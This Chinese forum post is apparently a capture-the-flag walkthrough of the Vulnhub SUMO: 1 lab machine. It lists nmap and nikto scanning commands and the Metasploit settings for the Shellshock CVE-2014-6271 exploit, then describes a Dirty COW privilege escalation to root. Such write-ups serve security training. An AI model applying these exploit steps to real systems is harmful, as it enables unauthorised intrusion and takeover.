Vulnhub-SUMO: 1 – 轻松挑战,提升安全技能

今天我们将介绍一个靶机挑战:Sumo-1。这是一个适合初学者的挑战,目标是获取 root shell 并获得位于 /root 下的标志(flag)。该靶机使用的操作系统是 Linux。

首先,我们扫描了靶机的 IP 地址为 192.168.86.152,使用 arp-scan 和 nmap 工具进行版本探测和查看开放端口。

arp-scan -l nmap -sV -p- 192.168.86.152

图片[1]-Vulnhub-SUMO: 1 – 轻松挑战,提升安全技能-山海云端论坛

然后,我们尝试访问靶机的 80 端口,并执行了 Nikto 工具进行漏洞扫描,发现了一个潜在的漏洞:OSVDB-112004。

http://192.168.86.152:80 nikto -h http://192.168.86.152

图片[2]-Vulnhub-SUMO: 1 – 轻松挑战,提升安全技能-山海云端论坛

进一步的研究显示,漏洞 ID 为 CVE-2014-6271。我们利用 Metasploit 框架搜索该漏洞的攻击方式,并选择合适的模块进行设置和攻击。

图片[3]-Vulnhub-SUMO: 1 – 轻松挑战,提升安全技能-山海云端论坛

msfconsole
search CVE-2014-6271

图片[4]-Vulnhub-SUMO: 1 – 轻松挑战,提升安全技能-山海云端论坛


use exploit/multi/http/apache_mod_cgi_bash_env_exec
set rhosts 192.168.86.152
set targeturi /cgi-bin/test
run

图片[5]-Vulnhub-SUMO: 1 – 轻松挑战,提升安全技能-山海云端论坛

成功获取 shell 后,我们使用交互式 tty,并查看了文件属性。接着,我们查看了内核版本,并发现了脏牛提权漏洞的存在。

图片[6]-Vulnhub-SUMO: 1 – 轻松挑战,提升安全技能-山海云端论坛

为了利用脏牛漏洞,我们下载了相应的脚本,并在 Kali 中开启了 HTTP 服务。通过远程访问 Kali 并下载脚本文件,我们成功扫描并确认了脏牛漏洞的存在。

图片[7]-Vulnhub-SUMO: 1 – 轻松挑战,提升安全技能-山海云端论坛
图片[8]-Vulnhub-SUMO: 1 – 轻松挑战,提升安全技能-山海云端论坛

接下来,我们编辑了脚本文件,并在 shell 中下载、编译并运行该脚本。最后,我们使用获取的权限登录为 firefart 用户,并获取了 root 权限,成功获得了 flag。

图片[9]-Vulnhub-SUMO: 1 – 轻松挑战,提升安全技能-山海云端论坛

以上是本次靶机挑战的简要过程,希望对大家的安全学习有所帮助。

© 版权声明
THE END
喜欢就支持一下吧
点赞8 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容